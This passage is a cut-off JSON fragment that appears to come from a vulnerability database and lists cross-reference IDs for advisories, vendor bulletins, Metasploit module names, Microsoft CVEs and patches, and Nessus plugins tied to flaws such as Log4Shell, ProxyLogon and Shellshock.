"AA23-165A", "AA23-215A", "AA23-250A", "ICSA-14-269-01A", "ICSA-15-344-01", "ICSA-15-344-01B", "ICSA-21-357-02", "ICSA-22-034-01", "ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:0009F92C7DBF6D1163E64AF402687506", "IMPERVABLOG:2303181B17E64D6C752ACD64C5A2B39C", "IMPERVABLOG:357497C932E21C66FB08D2C9B8EE9CA2", "IMPERVABLOG:4124E2CCDA610C6D222319C47C8D3250", "IMPERVABLOG:5E03360E0443A626205E9BCF969114F6", "IMPERVABLOG:7B28F00C5CD12AC5314EB23EAE40413B", "IMPERVABLOG:7CB37AC69862942C5D316E69A7815579", "IMPERVABLOG:85E1B351EDAA80DF81632A8B8BD07634", "IMPERVABLOG:937EDF98C40EFDDA392CC06661F152F0", "IMPERVABLOG:A30E92D9B177CCFF9F5476DD34E25F51", "IMPERVABLOG:B4C9A56D0F82346F616E74B1CFB10A5D", "IMPERVABLOG:B69DFFED5C2E2C9D2F9917E3F4915200", "IMPERVABLOG:BB63986B2DE2CCB2C65DD3747791097F", "IMPERVABLOG:BB987E93C1A58280077D98CF497FD72D", "IMPERVABLOG:BE9CCB7ADF74E2AEFC999FEE704CDE71", "IMPERVABLOG:BEE8EB9D446D0AF62464EE59DFA0CE0E", "IMPERVABLOG:D1F1D344B2FD670184AA4FB99A50BD1B", "IMPERVABLOG:DB0BBA5A6E2E523FAA7F7A73C45FEA96"]}, {"type": "intel", "idList": ["INTEL:INTEL-SA-00646"]}, {"type": "jvn", "idList": ["JVN:55667175"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979", "KLA10995", "KLA11024", "KLA11059", "KLA11069", "KLA11139", "KLA11170", "KLA11241", "KLA11835", "KLA11894", "KLA11902", "KLA11929", "KLA11931", "KLA12103", "KLA12169", "KLA12224", "KLA12390", "KLA12392", "KLA12393", "KLA12395", "KLA12396", "KLA12442"]}, {"type": "kitploit", "idList": ["KITPLOIT:1207079539580982634", "KITPLOIT:1680589374755422772", "KITPLOIT:1907207623071471216", "KITPLOIT:2779031464033627796", "KITPLOIT:4421457840699592233", "KITPLOIT:4707889613618662864", "KITPLOIT:5052987141331551837", "KITPLOIT:5104415481503400470", "KITPLOIT:5420210148456420402", "KITPLOIT:6411625084720414057", "KITPLOIT:648469287269586263", "KITPLOIT:6759391622067035795", "KITPLOIT:7013881512724945934", "KITPLOIT:7835941952769002973", "KITPLOIT:7847586937102427883", "KITPLOIT:866017936175971203", "KITPLOIT:8672599587089685905", "KITPLOIT:9146046356497464176", "KITPLOIT:965198862441671998"]}, {"type": "krebs", "idList": ["KREBS:0C41B2B6F52FFC252ABCE6236C6350E0", "KREBS:1BEFD58F5124A2E4CA40BD9C1B49B9B7", "KREBS:4F19DF7091060B198B092ABE2F7E1AA8", "KREBS:62E2D32C0ABD1C4B8EA91C60B425255B", "KREBS:65D25A653F7348C7F18FFD951447B275", "KREBS:831FD0B726B800B2995A68BA50BD8BE3", "KREBS:952ACEBFD55EBD076910C6B233491883", "KREBS:A8F0DD3F6E965A3A66B2CCBB003ACF62"]}, {"type": "lenovo", "idList": ["LENOVO:PS500044-GNU-BOURNE-AGAIN-SHELL-BASH-SHELLSHOCK-NOSID", "LENOVO:PS500044-NOSID"]}, {"type": "mageia", "idList": ["MGASA-2014-0388", "MGASA-2014-0393", "MGASA-2020-0380", "MGASA-2021-0556", "MGASA-2021-0566", "MGASA-2023-0141"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:0FEB0AF7A8D15834DA7D1882395A9D7C", "MALWAREBYTES:1476491C6EB2E7829EC63A183A35CE8B", "MALWAREBYTES:16440CAA6CF5418D984950D297C8549D", "MALWAREBYTES:1AE2302579AF5E9849B438BD21910FB8", "MALWAREBYTES:1B8D17909172F80C0F82CB21FDFC33B2", "MALWAREBYTES:1EF2E06811A91F2948F835D21FF698ED", "MALWAREBYTES:21860B5266FF4C6017A8B388973F2911", "MALWAREBYTES:22A53B0983AD9ADDB8E7F3DC1E2A1440", "MALWAREBYTES:29082210E17AE80B08D8FF58AED79F23", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:2D17A77CBCBBFFE150012C3B71E53FC6", "MALWAREBYTES:3067D03AD5A4441FEBB702BADFD6C4A1", "MALWAREBYTES:30BC856501B7BB42655FA3109FACCA26", "MALWAREBYTES:3350250AEB75AAF452630CE0B7306455", "MALWAREBYTES:39A05D4A4EC81966F7A1721DFACB3470", "MALWAREBYTES:42218FB85F05643E0B2C2C7D259EFEB5", "MALWAREBYTES:4690DE85CA58136434BF7E127237802F", "MALWAREBYTES:4CB01833826116B2823401DFB69A5431", "MALWAREBYTES:4F1B52F3E373AB0DA5BF646A554AEE8D", "MALWAREBYTES:5899EF0CF34937AFA2DB4AB02D282DF6", "MALWAREBYTES:5B32671B820EEB03840B798BCEA9FDC8", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:60B52235DCBD12E98C7DB46F859F885C", "MALWAREBYTES:68B17F5C372DE1EBC787E579794B6AD9", "MALWAREBYTES:6A4862332586F98DA4761BE2B684752F", "MALWAREBYTES:6C5219B55CB625F7D9D16F7CD92E526C", "MALWAREBYTES:6ECB9DE9A2D8D714DB50F19BAF7BF3D4", "MALWAREBYTES:775442060A0795887FAB657C06773723", "MALWAREBYTES:78E91E28F51B0A15B6CA53FF8A9B480B", "MALWAREBYTES:7C9E5CAE3DDA4E673D38360AB2A5706B", "MALWAREBYTES:7D6B4BABB8063861BF6305FDC03DBE1C", "MALWAREBYTES:80B21E934B1C43C7071F039FE9512208", "MALWAREBYTES:8922C922FFDE8B91C7154D8C990B62EF", "MALWAREBYTES:A325F8FB1D527BD3C6C1C3A187840632", "MALWAREBYTES:B0F2474F776241731FE08EA7972E6239", "MALWAREBYTES:B24AD5C8381AD8F711BC02246606B36A", "MALWAREBYTES:B3C57DCB817E8FCEC5860BC0C22D5A2A", "MALWAREBYTES:B4D157FAC0EB655355514D120382CC56", "MALWAREBYTES:B830332817B5D5BEE99EF296E8EC7E2A", "MALWAREBYTES:B8C767042833344389F6158273089954", "MALWAREBYTES:BAB94968DD1EC37DA6F977226977DAF5", "MALWAREBYTES:C0A087A65BF94128AA1574F7D45E306B", "MALWAREBYTES:C7D9126F912DAC06B9FBA1B29BF174BC", "MALWAREBYTES:C8D6FFC9442802684305F89A89609938", "MALWAREBYTES:C982F670DC06D05621493C9E9A1E0E14", "MALWAREBYTES:CA0A032ADCA72FCB979CB83795FC527B", "MALWAREBYTES:CCB1B1B23474798BB372D709A6E97F86", "MALWAREBYTES:D081BF7F95E3F31C6DB8CEF9AD86BD0D", "MALWAREBYTES:D7EFF87E8AB1DBEC63A0DBE7F8DA90B8", "MALWAREBYTES:DA40246EC094218998CD2BD24735C7A6", "MALWAREBYTES:DF971420296B93EE8C9E45DB00CEACC3", "MALWAREBYTES:F40C2861F5D3CFF011E96C0D46C51A46", "MALWAREBYTES:F79B9F46F986F9BDA455EEBF8E2CA464", "MALWAREBYTES:FC8647475CCD473D01B5C0257286E101"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-ADMIN-DCERPC-CVE_2020_1472_ZEROLOGON-", "MSF:AUXILIARY-GATHER-EXCHANGE_PROXYLOGON_COLLECTOR-", "MSF:AUXILIARY-SCANNER-HTTP-APACHE_MOD_CGI_BASH_ENV-", "MSF:AUXILIARY-SCANNER-HTTP-CITRIX_DIR_TRAVERSAL-", "MSF:AUXILIARY-SCANNER-HTTP-EXCHANGE_PROXYLOGON-", "MSF:AUXILIARY-SCANNER-HTTP-LOG4SHELL_SCANNER-", "MSF:EXPLOIT-FREEBSD-HTTP-CITRIX_DIR_TRAVERSAL_RCE-", "MSF:EXPLOIT-LINUX-HTTP-ADVANTECH_SWITCH_BASH_ENV_EXEC-", "MSF:EXPLOIT-LINUX-HTTP-IPFIRE_BASHBUG_EXEC-", "MSF:EXPLOIT-LINUX-HTTP-MOBILEIRON_CORE_LOG4SHELL-", "MSF:EXPLOIT-MULTI-BROWSER-JAVA_ATOMICREFERENCEARRAY-", "MSF:EXPLOIT-MULTI-BROWSER-JAVA_VERIFIER_FIELD_ACCESS-", "MSF:EXPLOIT-MULTI-HTTP-APACHE_MOD_CGI_BASH_ENV_EXEC-", "MSF:EXPLOIT-MULTI-HTTP-ATLASSIAN_CONFLUENCE_WEBWORK_OGNL_INJECTION-", "MSF:EXPLOIT-MULTI-HTTP-CUPS_BASH_ENV_EXEC-", "MSF:EXPLOIT-MULTI-HTTP-LOG4SHELL_HEADER_INJECTION-", "MSF:EXPLOIT-MULTI-HTTP-VMWARE_VCENTER_LOG4SHELL-", "MSF:EXPLOIT-MULTI-MISC-WEBLOGIC_DESERIALIZE_ASYNCRESPONSESERVICE-", "MSF:EXPLOIT-WINDOWS-BROWSER-MS13_022_SILVERLIGHT_SCRIPT_OBJECT-", "MSF:EXPLOIT-WINDOWS-FILEFORMAT-OFFICE_MS17_11882-", "MSF:EXPLOIT-WINDOWS-FILEFORMAT-OFFICE_WORD_HTA-", "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_PROXYLOGON_RCE-", "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_PROXYSHELL_RCE-"]}, {"type": "mmpc", "idList": ["MMPC:0BCDCF68488C6A934B5C605C26DDC90F", "MMPC:1AFF4881941FA1030862F773DC84A4A8", "MMPC:1E3441B57C08BC18202B9FE758C2CA71", "MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "MMPC:28641FE2F73292EB4B26994613CC882B", "MMPC:2FB5327A309898BD59A467446C9C36DC", "MMPC:42ECD98DCF925DC4063DE66F75FB5433", "MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:4C62BE50213C7726C383DAD096CBBB99", "MMPC:567C6CC66BD942B4F1BBE84ED9F6665B", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:A086D121065A6253A8EECABD51EB16DF", "MMPC:A2F131E46442125176E4853C860A816C", "MMPC:BB2F5840056D55375C4A19D2FF07C695", "MMPC:C0F4687B18D53FB9596AD4FDF77092D8", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:D3341B3E36680D5272BC91A3694352AC", "MMPC:D6D537E875C3CBD84822A868D24B31BA", "MMPC:E537BA51663A720821A67D2A4F7F7F0E", "MMPC:F36351D1B5A5C40989F46EF8729039A7", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FC03200E57A46D16A8CD1A5A0E647BB3", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0144", "MS:CVE-2017-0145", "MS:CVE-2017-0199", "MS:CVE-2017-11882", "MS:CVE-2017-8570", "MS:CVE-2018-0802", "MS:CVE-2018-8174", "MS:CVE-2020-1472", "MS:CVE-2021-26412", "MS:CVE-2021-26854", "MS:CVE-2021-26855", "MS:CVE-2021-26857", "MS:CVE-2021-26858", "MS:CVE-2021-27065", "MS:CVE-2021-27078", "MS:CVE-2021-31196", "MS:CVE-2021-31206", "MS:CVE-2021-31207", "MS:CVE-2021-33768", "MS:CVE-2021-34470", "MS:CVE-2021-34473", "MS:CVE-2021-34523", "MS:CVE-2021-44228"]}, {"type": "mskb", "idList": ["KB2553204", "KB2664258", "KB2814124", "KB3141529", "KB3141538", "KB3162047", "KB3178703", "KB3178710", "KB3213545", "KB3213555", "KB3213624", "KB3213640", "KB4011262", "KB4011276", "KB4011574", "KB4011580", "KB4011604", "KB4011607", "KB4011610", "KB4011618", "KB4011643", "KB4011656", "KB4011659", "KB4013389", "KB4014793", "KB4103712", "KB4103715", "KB4103726", "KB4134651", "KB4601315", "KB4601318", "KB4601319", "KB4601345", "KB4601347", "KB4601348", "KB4601349", "KB4601357", "KB4601363", "KB4601384", "KB5000871", "KB5001779", "KB5003435"]}, {"type": "msrc", "idList": ["MSRC:11EE27B79C8FC8176F733C5748E02C96", "MSRC:35A18F0B9DCC4126DC5EC19296034C33", "MSRC:543F3A129A47F4B14FB170389908717B", "MSRC:5B84BD451283462DC81D4090EFE66280", "MSRC:5CBA045F26BE90EBCCB3C34E5CE2A790", "MSRC:617BB0BF7CDA5777BFA2E81C8277D73C", "MSRC:6EA997A78BB548DC0178952394874CE2", "MSRC:8F98074A1D86F9B965ADC16597E286ED", "MSRC:93A361B73FFA3EEFB6825C56F25103BB", "MSRC:96F2FB0D77EED0ABDED8EBD64AEBEA09", "MSRC:9783BD8B3A34301D0C5C34D252854BDF", "MSRC:9DA5AC102EA6224E027868594A8ED7B8", "MSRC:C28CD823FBB321014DB6D53A28DA0CD1", "MSRC:C6213215CC0BE4847F142F730607AFA2", "MSRC:D7503EE6392B6B3DC42482FC0340DB67", "MSRC:ED939F90BDE8D7A32031A750388B03C9"]}, {"type": "mssecure", "idList": ["MSSECURE:1AFF4881941FA1030862F773DC84A4A8", "MSSECURE:1E3441B57C08BC18202B9FE758C2CA71", "MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:28641FE2F73292EB4B26994613CC882B", "MSSECURE:2FB5327A309898BD59A467446C9C36DC", "MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:4C62BE50213C7726C383DAD096CBBB99", "MSSECURE:567C6CC66BD942B4F1BBE84ED9F6665B", "MSSECURE:7D81C7477636B6DB964C5D3E62D605D5", "MSSECURE:A086D121065A6253A8EECABD51EB16DF", "MSSECURE:A133B2DDF50F8BE904591C1BB592991A", "MSSECURE:A2F131E46442125176E4853C860A816C", "MSSECURE:BB2F5840056D55375C4A19D2FF07C695", "MSSECURE:C0F4687B18D53FB9596AD4FDF77092D8", "MSSECURE:C3D318931D83D536C01D2307EBC0B3B0", "MSSECURE:D3341B3E36680D5272BC91A3694352AC", "MSSECURE:D6D537E875C3CBD84822A868D24B31BA", "MSSECURE:DF21D5BD34E334683F0DCC4F64FDC83E", "MSSECURE:E3C8B97294453D962741782EC959E79C", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E", "MSSECURE:F36351D1B5A5C40989F46EF8729039A7", "MSSECURE:FC03200E57A46D16A8CD1A5A0E647BB3"]}, {"type": "myhack58", "idList": ["MYHACK58:62201454156", "MYHACK58:62201454165", "MYHACK58:62201681759", "MYHACK58:62201785187", "MYHACK58:62201785189", "MYHACK58:62201785243", "MYHACK58:62201785268", "MYHACK58:62201785272", "MYHACK58:62201785331", "MYHACK58:62201786371", "MYHACK58:62201786816", "MYHACK58:62201786827", "MYHACK58:62201788439", "MYHACK58:62201788542", "MYHACK58:62201789251", "MYHACK58:62201789425", "MYHACK58:62201890088", "MYHACK58:62201891024", "MYHACK58:62201891130", "MYHACK58:62201891201", "MYHACK58:62201891947", "MYHACK58:62201891962", "MYHACK58:62201892253", "MYHACK58:62201892510", "MYHACK58:62201994299", "MYHACK58:62201994507", "MYHACK58:62201994516", "MYHACK58:62201994562", "MYHACK58:62201994593", "MYHACK58:62201995674"]}, {"type": "nessus", "idList": ["AL2022_ALAS2022-2022-225.NASL", "AL2_ALAS-2021-001.NASL", "AL2_ALAS-2021-1585.NASL", "AL2_ALAS-2021-1649.NASL", "AL2_ALAS-2021-1730.NASL", "AL2_ALAS-2021-1731.NASL", "AL2_ALAS-2021-1732.NASL", "AL2_ALAS-2022-1739.NASL", "AL2_ALAS-2022-1773.NASL", "AL2_ALAS-2022-1806.NASL", "AL2_ALASCORRETTO8-2021-001.NASL", "AL2_ALASJAVA-OPENJDK11-2021-001.NASL", "ALA_ALAS-2012-88.NASL", "ALA_ALAS-2014-418.NASL", "ALA_ALAS-2014-419.NASL", "ALA_ALAS-2021-1469.NASL", "ALA_ALAS-2021-1553.NASL", "ALA_ALAS-2021-1554.NASL", "ALA_ALAS-2022-1562.NASL", "ALA_ALAS-2022-1580.NASL", "ALA_ALAS-2022-1601.NASL", "ALMA_LINUX_ALSA-2021-1647.NASL", "ALMA_LINUX_ALSA-2022-0290.NASL", "APACHE_APEREO_CAS_LOG4SHELL.NBIN", "APACHE_DRUID_LOG4SHELL.NBIN", "APACHE_JSPWIKI_LOG4SHELL.NBIN", "APACHE_LOG4J_2_15_0.NASL", "APACHE_LOG4J_2_16_0.NASL", "APACHE_LOG4J_WIN_2_15_0.NASL", "APACHE_OFBIZ_LOG4SHELL.NBIN", "APACHE_SOLR_LOG4SHELL.NBIN", "BASH_CVE_2014_6271_RCE.NASL", "BASH_CVE_2014_6278.NASL", "BASH_REMOTE_CODE_EXECUTION.NASL", "CENTOS8_RHSA-2021-1647.NASL", "CENTOS_RHSA-2012-0135.NASL", "CENTOS_RHSA-2012-0729.NASL", "CENTOS_RHSA-2012-0730.NASL", "CENTOS_RHSA-2012-1009.NASL", "CENTOS_RHSA-2014-1293.NASL", "CENTOS_RHSA-2014-1306.NASL", "CENTOS_RHSA-2020-5439.NASL", "CHECK_POINT_GAIA_SK102673.NASL", "CISCO-SA-20140926-BASH-NXOS.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-CUIC.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-ISE.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-SDWAN-VMANAGE.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-UCS-DIRECTOR.NASL", "CISCO-SA-CSCUR01959-ASA-CX.NASL", "CISCO-SA-CSCUR01959-PRSM.NASL", "CISCO_CUPS_CSCUR05454.NASL", "CISCO_TELEPRESENCE_CONDUCTOR_CSCUR02103.NASL", "CISCO_TELEPRESENCE_VCS_CSCUR01461.NASL", "CISCO_UCS_DIRECTOR_CSCUR02877.NASL", "CITRIX_NETSCALER_CTX267027.NASL", "CITRIX_SSL_VPN_CVE-2019-19781.NBIN", "CONFLUENCE_CONFSERVER-67940.NASL", "CONFLUENCE_CVE_2021_26084.NBIN", "DEBIAN_DLA-2463.NASL", "DEBIAN_DLA-2842.NASL", "DEBIAN_DLA-2905.NASL", "DEBIAN_DLA-63.NASL", "DEBIAN_DSA-2420.NASL", "DEBIAN_DSA-2507.NASL", "DEBIAN_DSA-3032.NASL", "DEBIAN_DSA-3035.NASL", "DEBIAN_DSA-5020.NASL", "DEBIAN_DSA-5022.NASL", "EULEROS_SA-2019-1418.NASL", "EULEROS_SA-2020-2171.NASL", "EULEROS_SA-2020-2181.NASL", "EULEROS_SA-2020-2299.NASL", "EULEROS_SA-2020-2396.NASL", "EULEROS_SA-2021-1050.NASL", "EULEROS_SA-2021-1118.NASL", "EULEROS_SA-2021-1517.NASL", "EULEROS_SA-2021-1533.NASL", "EULEROS_SA-2021-1625.NASL", "EULEROS_SA-2021-1635.NASL", "EULEROS_SA-2021-2168.NASL", "EULEROS_SA-2022-1276.NASL", "EXCHANGE_CVE-2021-26855.NBIN", "F5_BIGIP_SOL15629.NASL", "FEDORA_2012-9541.NASL", "FEDORA_2012-9545.NASL", "FEDORA_2012-9590.NASL", "FEDORA_2012-9593.NASL", "FEDORA_2014-11295.NASL", "FEDORA_2014-11360.NASL", "FEDORA_2014-11503.NASL", "FEDORA_2014-11514.NASL", "FEDORA_2014-11527.NASL", "FEDORA_2014-11718.NASL", "FEDORA_2020-0BE2776ED3.NASL", "FEDORA_2020-77C15664B0.NASL", "FEDORA_2020-A1D139381A.NASL", "FORTIOS_FG-IR-18-384.NASL", "FORTIOS_FG-IR-18-384_DIRECT.NASL", "FREEBSD_PKG_1EA05BB85D7411ECBB1E001517A2E1A4.NASL", "FREEBSD_PKG_24ACE516FAD711EA8D8C005056A311D1.NASL", "FREEBSD_PKG_2BAB995F36D411EA9DAD002590ACAE31.NASL", "FREEBSD_PKG_3FADD7E4F8FB45A0A2188FD6423C338F.NASL", "FREEBSD_PKG_4B1AC5A35BD411EC8602589CFC007716.NASL", "FREEBSD_PKG_515DF85A5CD711ECA16D001517A2E1A4.NASL", "FREEBSD_PKG_650734B2766541709A0AEECED5E10A5E.NASL", "FREEBSD_PKG_71AD81DA441411E4A33E3C970E169BC2.NASL", "FREEBSD_PKG_81E2B3084A6C11E4B7116805CA0B3D42.NASL", "FREEBSD_PKG_93A1C9A75BEF11ECA47A001517A2E1A4.NASL", "FREEBSD_PKG_B0F49CB9673611EC9EEA589CFC007716.NASL", "GENTOO_GLSA-201401-30.NASL", "GENTOO_GLSA-201406-32.NASL", "GENTOO_GLSA-201409-09.NASL", "GENTOO_GLSA-201409-10.NASL", "GENTOO_GLSA-202012-24.NASL", "GENTOO_GLSA-202209-02.NASL", "IBM_STORWIZE_1_5_0_4.NASL", "JUNIPER_SPACE_JSA10648.NASL", "LOG4J_VULNERABLE_ECOSYSTEM_LAUNCHER.NASL", "MACOSX_10_10.NASL", "MACOSX_FORTIOS_FG-IR-18-384.NASL", "MACOSX_JAVA_10_6_UPDATE7.NASL", "MACOSX_JAVA_10_6_UPDATE9.NASL", "MACOSX_JAVA_10_7_2012-001.NASL", "MACOSX_JAVA_10_7_2012-004.NASL", "MACOSX_MS13-022.NASL", "MACOSX_SECUPD2014-005.NASL", "MACOSX_SHELLSHOCK_UPDATE.NASL", "MACOS_SPLUNK_824.NASL", "MANDRIVA_MDVSA-2012-095.NASL", "MANDRIVA_MDVSA-2014-186.NASL", "MANDRIVA_MDVSA-2014-190.NASL", "MANDRIVA_MDVSA-2015-164.NASL", "MCAFEE_EMAIL_GATEWAY_SB10085.NASL", "MCAFEE_NGFW_SB10085.NASL", "MCAFEE_WEB_GATEWAY_SB10085.NASL", "MOBILEIRON_LOG4SHELL.NBIN", "MS17-010.NASL", "NETLOGON_ZEROLOGON_CVE-2020-1472.NBIN", "NEWSTART_CGSL_NS-SA-2021-0024_SAMBA.NASL", "NEWSTART_CGSL_NS-SA-2021-0118_BASH.NASL", "NEWSTART_CGSL_NS-SA-2021-0167_SAMBA.NASL", "NEWSTART_CGSL_NS-SA-2022-0058_SAMBA.NASL", "NUTANIX_NXSA-AOS-5_20_4.NASL", "NUTANIX_NXSA-AOS-6_0_2_5.NASL", "NUTANIX_NXSA-AOS-6_1.NASL", "NUTANIX_NXSA-AOS-6_1_1.NASL", "OPENSUSE-2012-368.NASL", "OPENSUSE-2014-559.NASL", "OPENSUSE-2014-563.NASL", "OPENSUSE-2014-564.NASL", "OPENSUSE-2014-567.NASL", "OPENSUSE-2014-594.NASL", "OPENSUSE-2014-595.NASL", "OPENSUSE-2020-1513.NASL", "OPENSUSE-2020-1526.NASL", "OPENSUSE-2021-1577.NASL", "OPENSUSE-2021-1586.NASL", "OPENSUSE-2021-1601.NASL", "OPENSUSE-2021-1612.NASL", "OPENSUSE-2021-1613.NASL", "OPENSUSE-2021-1631.NASL", "OPENSUSE-2021-3999.NASL", "OPENSUSE-2021-4094.NASL", "OPENSUSE-2021-4107.NASL", "OPENSUSE-2021-4109.NASL", "OPENSUSE-2021-4111.NASL", "OPENSUSE-2021-4112.NASL", "OPENSUSE-2022-0038-1.NASL", "ORACLELINUX_ELSA-2012-0135.NASL", "ORACLELINUX_ELSA-2012-0322.NASL", "ORACLELINUX_ELSA-2012-0729.NASL", "ORACLELINUX_ELSA-2012-0730.NASL", "ORACLELINUX_ELSA-2012-1009.NASL", "ORACLELINUX_ELSA-2014-1293.NASL", "ORACLELINUX_ELSA-2014-1294.NASL", "ORACLELINUX_ELSA-2014-1306.NASL", "ORACLELINUX_ELSA-2020-5439.NASL", "ORACLELINUX_ELSA-2021-1647.NASL", "ORACLELINUX_ELSA-2021-5206.NASL", "ORACLELINUX_ELSA-2022-0290.NASL", "ORACLELINUX_ELSA-2022-9056.NASL", "ORACLE_JAVA_CPU_FEB_2012.NASL", "ORACLE_JAVA_CPU_FEB_2012_UNIX.NASL", "ORACLE_JAVA_CPU_JUN_2012.NASL", "ORACLE_JAVA_CPU_JUN_2012_UNIX.NASL", "ORACLE_PRIMAVERA_GATEWAY_CPU_JAN_2022.NASL", "ORACLE_PRIMAVERA_P6_EPPM_CPU_JAN_2022.NASL", "ORACLE_WEBLOGIC_CVE-2019-2725.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_JUL_2019.NASL", "PALO_ALTO_LOG4SHELL.NASL", "PALO_ALTO_PAN-SA-2014-0004.NASL", "PROFTPD_BASH_INJECTION.NASL", "PULSE_CONNECT_SECURE-CVE-2019-11510.NASL", "PULSE_CONNECT_SECURE-SA-44101.NASL", "PULSE_CONNECT_SECURE_PATH_TRAVERSAL.NBIN", "REDHAT-RHSA-2012-0135.NASL", "REDHAT-RHSA-2012-0139.NASL", "REDHAT-RHSA-2012-0322.NASL", "REDHAT-RHSA-2012-0508.NASL", "REDHAT-RHSA-2012-0514.NASL", "REDHAT-RHSA-2012-0729.NASL", "REDHAT-RHSA-2012-0730.NASL", "REDHAT-RHSA-2012-0734.NASL", "REDHAT-RHSA-2012-1009.NASL", "REDHAT-RHSA-2012-1019.NASL", "REDHAT-RHSA-2013-1455.NASL", "REDHAT-RHSA-2014-1293.NASL", "REDHAT-RHSA-2014-1294.NASL", "REDHAT-RHSA-2014-1306.NASL", "REDHAT-RHSA-2014-1311.NASL", "REDHAT-RHSA-2014-1354.NASL", "REDHAT-RHSA-2020-5439.NASL", "REDHAT-RHSA-2021-1647.NASL", "REDHAT-RHSA-2021-3723.NASL", "REDHAT-RHSA-2022-1296.NASL", "REDHAT-RHSA-2022-1297.NASL", "SHELLSHOCK_MAIL_AGENTS.NASL", "SHELLSHOCK_POSTFIX_FILTERS.NASL", "SHELLSHOCK_QMAIL.NASL", "SHELLSHOCK_SIP_INVITE.NASL", "SLACKWARE_SSA_2014-267-01.NASL", "SL_20120613_JAVA_1_6_0_OPENJDK_ON_SL5_X.NASL", "SL_20120613_JAVA_1_6_0_OPENJDK_ON_SL6_X.NASL", "SL_20120613_JAVA_1_6_0_SUN_ON_SL5_X.NASL", "SL_20140924_BASH_ON_SL5_X.NASL", "SL_20140926_BASH_ON_SL5_X.NASL", "SL_20201215_SAMBA_ON_SL7_X.NASL", "SMB_NT_MS12-027.NASL", "SMB_NT_MS13-022.NASL", "SMB_NT_MS17-010.NASL", "SMB_NT_MS17-APR_4015551.NASL", "SMB_NT_MS17_APR_4014793.NASL", "SMB_NT_MS17_APR_4015549.NASL", "SMB_NT_MS17_APR_OFFICE.NASL", "SMB_NT_MS17_JUL_OFFICE.NASL", "SMB_NT_MS17_NOV_OFFICE.NASL", "SMB_NT_MS18_JAN_OFFICE.NASL", "SMB_NT_MS18_JAN_OFFICE_COMPATIBILITY.NASL", "SMB_NT_MS18_MAY_4103716.NASL", "SMB_NT_MS18_MAY_4103718.NASL", "SMB_NT_MS18_MAY_4103721.NASL", "SMB_NT_MS18_MAY_4103723.NASL", "SMB_NT_MS18_MAY_4103725.NASL", "SMB_NT_MS18_MAY_4103727.NASL", "SMB_NT_MS18_MAY_4103730.NASL", "SMB_NT_MS18_MAY_4103731.NASL", "SMB_NT_MS18_MAY_WIN2008.NASL", "SMB_NT_MS20_AUG_4565349.NASL", "SMB_NT_MS20_AUG_4571694.NASL", "SMB_NT_MS20_AUG_4571703.NASL", "SMB_NT_MS20_AUG_4571729.NASL", "SMB_NT_MS20_AUG_4571736.NASL", "SMB_NT_MS21_APR_EXCHANGE.NASL", "SMB_NT_MS21_FEB_4601347.NASL", "SMB_NT_MS21_MAR_EXCHANGE_OOB.NASL", "SMB_NT_MS21_MAY_EXCHANGE.NASL", "SOLARIS10_126546-06.NASL", "SOLARIS10_126546.NASL", "SOLARIS10_X86_126547.NASL", "SOLARIS11_BASH_20141031.NASL", "SOLARIS11_BASH_20141031_2.NASL", "SOLARIS11_BASH_2014_10_07.NASL", "SOLARIS9_149079-01.NASL", "SOLARIS9_149079.NASL", "SOLARIS9_X86_149080-01.NASL", "SOLARIS9_X86_149080.NASL", "SOLR_CVE-2021-44228.NASL", "SPLUNK_824.NASL", "SUSE_11_BASH-140919.NASL", "SUSE_11_BASH-140926.NASL", "SUSE_11_JAVA-1_6_0-IBM-120427.NASL", "SUSE_11_JAVA-1_6_0-OPENJDK-120615.NASL", "SUSE_JAVA-1_5_0-IBM-8100.NASL", "SUSE_JAVA-1_6_0-IBM-8094.NASL", "SUSE_SU-2020-2719-1.NASL", "SUSE_SU-2020-2720-1.NASL", "SUSE_SU-2020-2721-1.NASL", "SUSE_SU-2020-2722-1.NASL", "SUSE_SU-2020-2724-1.NASL", "SUSE_SU-2020-2730-1.NASL", "SUSE_SU-2021-14866-1.NASL", "SUSE_SU-2021-4111-1.NASL", "SUSE_SU-2021-4112-1.NASL", "SUSE_SU-2021-4115-1.NASL", "UBIQUITI_UNIFI_NETWORK_LOG4SHELL.NBIN", "UBUNTU_USN-1373-1.NASL", "UBUNTU_USN-1373-2.NASL", "UBUNTU_USN-1505-1.NASL", "UBUNTU_USN-1505-2.NASL", "UBUNTU_USN-2362-1.NASL", "UBUNTU_USN-4510-1.NASL", "UBUNTU_USN-4559-1.NASL", "UBUNTU_USN-5192-1.NASL", "UBUNTU_USN-5192-2.NASL", "UBUNTU_USN-5197-1.NASL", "UBUNTU_USN-5223-1.NASL", "VCENTER_OPERATIONS_MANAGER_VMSA_2014-0010.NASL", "VMWARE_HORIZON_LOG4SHELL.NBIN", "VMWARE_NSX_VMSA_2014_0010.NASL", "VMWARE_VCENTER_CONVERTER_2014-0010.NASL", "VMWARE_VCENTER_LOG4SHELL.NBIN", "VMWARE_VCENTER_SERVER_APPLIANCE_VMSA-2014-0010.NASL", "VMWARE_VCENTER_UPDATE_MGR_VMSA-2012-0013.NASL", 